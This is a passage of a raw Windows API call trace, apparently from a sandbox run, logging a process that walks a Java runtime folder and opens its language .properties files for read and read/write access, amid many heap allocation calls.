hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0094.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0094.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0094.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0094.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0094.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0094.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0094.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0094.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0094.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0094.883] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.883] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.883] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.883] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0094.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0094.883] AreFileApisANSI () returned 1 [0094.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties", lpUsedDefaultChar=0x0) returned 72 [0094.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0094.883] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.883] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0094.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0094.884] AreFileApisANSI () returned 1 [0094.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0094.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0094.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties") returned 72 [0094.884] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_pt_br.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.073] GetFileType (hFile=0x368) returned 0x1 [0095.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0095.074] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0095.074] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0095.074] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0095.074] CloseHandle (hObject=0x368) returned 1 [0095.074] AreFileApisANSI () returned 1 [0095.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0095.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0095.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8ac50, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties") returned 72 [0095.075] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_pt_br.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.075] GetFileType (hFile=0x368) returned 0x1 [0095.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0095.075] CloseHandle (hObject=0x368) returned 1 [0095.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0095.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0095.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0095.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0095.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0095.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0095.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0095.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0095.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0095.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0095.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0095.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0095.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0095.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0095.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0095.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0095.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0095.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0095.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0095.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0095.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0095.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0095.076] AreFileApisANSI () returned 1 [0095.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0095.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0095.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties") returned 72 [0095.076] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_pt_br.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xcd5)) returned 1 [0095.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0095.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0095.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0095.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.077] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xd51, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="messages_sv.properties", cAlternateFileName="ME0541~1.PRO")) returned 1 [0095.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0095.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0095.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0095.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0095.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0095.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0095.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0095.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0095.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0095.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0095.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0095.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0095.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0095.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0095.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0095.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0095.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0095.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0095.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0095.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0095.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0095.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0095.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.078] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.078] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0095.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0095.078] AreFileApisANSI () returned 1 [0095.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties", lpUsedDefaultChar=0x0) returned 69 [0095.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0095.078] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.078] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0095.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0095.078] AreFileApisANSI () returned 1 [0095.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0095.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0095.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties") returned 69 [0095.078] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.079] GetFileType (hFile=0x368) returned 0x1 [0095.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0095.079] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0095.079] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0095.079] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0095.079] CloseHandle (hObject=0x368) returned 1 [0095.079] AreFileApisANSI () returned 1 [0095.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0095.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0095.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties") returned 69 [0095.079] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.080] GetFileType (hFile=0x368) returned 0x1 [0095.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0095.080] CloseHandle (hObject=0x368) returned 1 [0095.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0095.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0095.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0095.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0095.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0095.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0095.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0095.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0095.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0095.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0095.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0095.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0095.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0095.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0095.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0095.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0095.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0095.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0095.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0095.081] AreFileApisANSI () returned 1 [0095.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0095.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0095.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties") returned 69 [0095.081] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xd51)) returned 1 [0095.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0095.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 